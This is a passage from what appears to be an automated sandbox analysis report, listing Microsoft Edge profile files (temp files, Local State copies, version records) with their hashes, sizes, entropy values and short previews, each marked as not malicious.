                                                                                                                                                                                                                                                                                                                                                        SHA-256:2343C541E095E1D5F202E8D2A0807113E69E1969AF8E15E3644C51DB0BF33FBF
                                                                                                                                                                                                                                                                                                                                                        SHA-512:00ADE38E9D2F07C64648202F1D5F18A2DFB2781C0517EAEBCD567D8A77DBB7CB40A58B7C7D4EC03336A63A20D2E11DD64448F020C6FF72F06CA870AA2B4765E0
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:{.. "DefaultCohort": {.. "21f3388b-c2a5-4791-8f6e-a4cad6d17f4f.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.BingHomePage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Covid.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Finance.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Jobs.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.KnowledgeCard.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Local.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.NTP3PCLICK.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.NotifySearchPage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Recipe.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.SearchPage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Sports.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Travel.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Weather.Bubble": 1,.. "2cb2db96-3bd0-403e-abe2-9269b3761041.Bubble": 1,.

                                                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\b0781386-dbb1-46aa-8a64-4180c26c6a26.tmp

                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:very short file (no magic)
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:3:L:L
                                                                                                                                                                                                                                                                                                                                                        MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                                                                                                                                                                                                                        SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                                                                                                                                                                                                                        SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                                                                                                                                                                                                                        SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:.

                                                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\cf55c626-73e7-4099-b083-77b3927b98c1.tmp

                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (17451), with no line terminators
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):17451
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.481376714809044
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:384:strPGQSu4MsbufhXoBIxxcInkobGXLQwK6WglaTYj:stOXuAuffkobGUBOaTYj
                                                                                                                                                                                                                                                                                                                                                        MD5:38697C3E3E4AC7605DBD6440D6311357
                                                                                                                                                                                                                                                                                                                                                        SHA1:E330D894F610DB94AB0AE12003049931E91E6B11
                                                                                                                                                                                                                                                                                                                                                        SHA-256:2D60B2DFEA207B82FCFEE5FD880F180EE725997C087E34F376C7FCADBC707EFF
                                                                                                                                                                                                                                                                                                                                                        SHA-512:2E60BA3B277428612FBDCFE3B68A57EEA9BA9680EFC4489E1E547A4953E064FA8DB7C2A86373E543793AF282E1D9DD1C9E3C7A9B4CD25525F0492E492A390385
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13376067972524486","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340900603634208","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"2caf0cf4-ea42-4083-b928-29b39da1182b":{"last_path":""},"2cb2db96-3bd0-403e-abe2-9269b3761041":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117

                                                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\ffddc154-b98f-4f76-9acc-2749c1f038f0.tmp

                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):12488
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.208346372402335
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:192:strJ99QTryDigabatSuypMsbusZihUkXiL8hbV+FXnICQA66WpaFIMYKPXYJ:strPGKSu4MsbufhBbGXLQx6WpaTYj
                                                                                                                                                                                                                                                                                                                                                        MD5:D6A23E205CBCF8669991C117245F1948
                                                                                                                                                                                                                                                                                                                                                        SHA1:0EA51195821CC4602372516E43730CA25B457207
                                                                                                                                                                                                                                                                                                                                                        SHA-256:2CCA5E442D4FFE06F9BA17209340411FC752B968A7850BDB6D921A49F30A5E49
                                                                                                                                                                                                                                                                                                                                                        SHA-512:BEDF4D085532971FA771E52679189E878FA3BCD99EAA26FD4B84CAF9CEE7B463AA90B3F5A376D0203D75C832B83F5CDB3E7688D24BD9A4056B5A8FD7D85F1C3F
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13376067972524486","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340900603634208","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"2caf0cf4-ea42-4083-b928-29b39da1182b":{"last_path":""},"2cb2db96-3bd0-403e-abe2-9269b3761041":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117

                                                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Last Browser

                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):120
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):3.32524464792714
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:3:tbloIlrJFlXnpQoWcNylRjlgbYnPdJiG6R7lZAUAl:tbdlrYoWcV0n1IGi7kBl
                                                                                                                                                                                                                                                                                                                                                        MD5:A397E5983D4A1619E36143B4D804B870
                                                                                                                                                                                                                                                                                                                                                        SHA1:AA135A8CC2469CFD1EF2D7955F027D95BE5DFBD4
                                                                                                                                                                                                                                                                                                                                                        SHA-256:9C70F766D3B84FC2BB298EFA37CC9191F28BEC336329CC11468CFADBC3B137F4
                                                                                                                                                                                                                                                                                                                                                        SHA-512:4159EA654152D2810C95648694DD71957C84EA825FCCA87B36F7E3282A72B30EF741805C610C5FA847CA186E34BDE9C289AAA7B6931C5B257F1D11255CD2A816
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.M.i.c.r.o.s.o.f.t.\.E.d.g.e.\.A.p.p.l.i.c.a.t.i.o.n.\.m.s.e.d.g.e...e.x.e.

                                                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Last Version

                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):13
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):2.7192945256669794
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:3:NYLFRQI:ap2I
                                                                                                                                                                                                                                                                                                                                                        MD5:BF16C04B916ACE92DB941EBB1AF3CB18
                                                                                                                                                                                                                                                                                                                                                        SHA1:FA8DAEAE881F91F61EE0EE21BE5156255429AA8A
                                                                                                                                                                                                                                                                                                                                                        SHA-256:7FC23C9028A316EC0AC25B09B5B0D61A1D21E58DFCF84C2A5F5B529129729098
                                                                                                                                                                                                                                                                                                                                                        SHA-512:F0B7DF5517596B38D57C57B5777E008D6229AB5B1841BBE74602C77EEA2252BF644B8650C7642BD466213F62E15CC7AB5A95B28E26D3907260ED1B96A74B65FB
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:117.0.2045.47

                                                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State (copy)

                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):44137
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):6.0906927501100725
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kkBMewuF9hDO6vP6O+Itbzy70FqHoPFkGoup1Xl3jVu:z/Ps+wsI7ynEg6Vtbz8hu3VlXr4CRo1
                                                                                                                                                                                                                                                                                                                                                        MD5:ABCAB3E5B6E32C4E7C9F3D8DCB0B7BE1
                                                                                                                                                                                                                                                                                                                                                        SHA1:D9635CF0E4335C485684956EF9E53161BA7D718B
                                                                                                                                                                                                                                                                                                                                                        SHA-256:5F87ED1527C56AA5561F6EFE2035C5A667C8599F324D15F4EDE24BD774C04A04
                                                                                                                                                                                                                                                                                                                                                        SHA-512:0F5A4EFDF2E3BED6DA596A56436D62C28269036EFCF8CDE7F35A168AC07E7ED447C8D5E512328617D93C05BF5900074C804F564E9C117D8EB6789AEF244485F0
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF437e5.TMP (copy)

                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):44137
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):6.0906927501100725
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kkBMewuF9hDO6vP6O+Itbzy70FqHoPFkGoup1Xl3jVu:z/Ps+wsI7ynEg6Vtbz8hu3VlXr4CRo1
                                                                                                                                                                                                                                                                                                                                                        MD5:ABCAB3E5B6E32C4E7C9F3D8DCB0B7BE1
                                                                                                                                                                                                                                                                                                                                                        SHA1:D9635CF0E4335C485684956EF9E53161BA7D718B
                                                                                                                                                                                                                                                                                                                                                        SHA-256:5F87ED1527C56AA5561F6EFE2035C5A667C8599F324D15F4EDE24BD774C04A04
                                                                                                                                                                                                                                                                                                                                                        SHA-512:0F5A4EFDF2E3BED6DA596A56436D62C28269036EFCF8CDE7F35A168AC07E7ED447C8D5E512328617D93C05BF5900074C804F564E9C117D8EB6789AEF244485F0
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF43862.TMP (copy)

                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):44137
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):6.0906927501100725
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kkBMewuF9hDO6vP6O+Itbzy70FqHoPFkGoup1Xl3jVu:z/Ps+wsI7ynEg6Vtbz8hu3VlXr4CRo1
                                                                                                                                                                                                                                                                                                                                                        MD5:ABCAB3E5B6E32C4E7C9F3D8DCB0B7BE1
                                                                                                                                                                                                                                                                                                                                                        SHA1:D9635CF0E4335C485684956EF9E53161BA7D718B
                                                                                                                                                                                                                                                                                                                                                        SHA-256:5F87ED1527C56AA5561F6EFE2035C5A667C8599F324D15F4EDE24BD774C04A04
                                                                                                                                                                                                                                                                                                                                                        SHA-512:0F5A4EFDF2E3BED6DA596A56436D62C28269036EFCF8CDE7F35A168AC07E7ED447C8D5E512328617D93C05BF5900074C804F564E9C117D8EB6789AEF244485F0
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF4395c.TMP (copy)

                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):44137
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):6.0906927501100725
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kkBMewuF9hDO6vP6O+Itbzy70FqHoPFkGoup1Xl3jVu:z/Ps+wsI7ynEg6Vtbz8hu3VlXr4CRo1
                                                                                                                                                                                                                                                                                                                                                        MD5:ABCAB3E5B6E32C4E7C9F3D8DCB0B7BE1
                                                                                                                                                                                                                                                                                                                                                        SHA1:D9635CF0E4335C485684956EF9E53161BA7D718B
                                                                                                                                                                                                                                                                                                                                                        SHA-256:5F87ED1527C56AA5561F6EFE2035C5A667C8599F324D15F4EDE24BD774C04A04
                                                                                                                                                                                                                                                                                                                                                        SHA-512:0F5A4EFDF2E3BED6DA596A56436D62C28269036EFCF8CDE7F35A168AC07E7ED447C8D5E512328617D93C05BF5900074C804F564E9C117D8EB6789AEF244485F0
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF4602d.TMP (copy)

                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):44137
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):6.0906927501100725
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kkBMewuF9hDO6vP6O+Itbzy70FqHoPFkGoup1Xl3jVu:z/Ps+wsI7ynEg6Vtbz8hu3VlXr4CRo1
                                                                                                                                                                                                                                                                                                                                                        MD5:ABCAB3E5B6E32C4E7C9F3D8DCB0B7BE1
                                                                                                                                                                                                                                                                                                                                                        SHA1:D9635CF0E4335C485684956EF9E53161BA7D718B
                                                                                                                                                                                                                                                                                                                                                        SHA-256:5F87ED1527C56AA5561F6EFE2035C5A667C8599F324D15F4EDE24BD774C04A04
                                                                                                                                                                                                                                                                                                                                                        SHA-512:0F5A4EFDF2E3BED6DA596A56436D62C28269036EFCF8CDE7F35A168AC07E7ED447C8D5E512328617D93C05BF5900074C804F564E9C117D8EB6789AEF244485F0
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF49612.TMP (copy)

                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):44137
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):6.0906927501100725
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kkBMewuF9hDO6vP6O+Itbzy70FqHoPFkGoup1Xl3jVu:z/Ps+wsI7ynEg6Vtbz8hu3VlXr4CRo1
                                                                                                                                                                                                                                                                                                                                                        MD5:ABCAB3E5B6E32C4E7C9F3D8DCB0B7BE1
                                                                                                                                                                                                                                                                                                                                                        SHA1:D9635CF0E4335C485684956EF9E53161BA7D718B
                                                                                                                                                                                                                                                                                                                                                        SHA-256:5F87ED1527C56AA5561F6EFE2035C5A667C8599F324D15F4EDE24BD774C04A04
                                                                                                                                                                                                                                                                                                                                                        SHA-512:0F5A4EFDF2E3BED6DA596A56436D62C28269036EFCF8CDE7F35A168AC07E7ED447C8D5E512328617D93C05BF5900074C804F564E9C117D8EB6789AEF244485F0
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
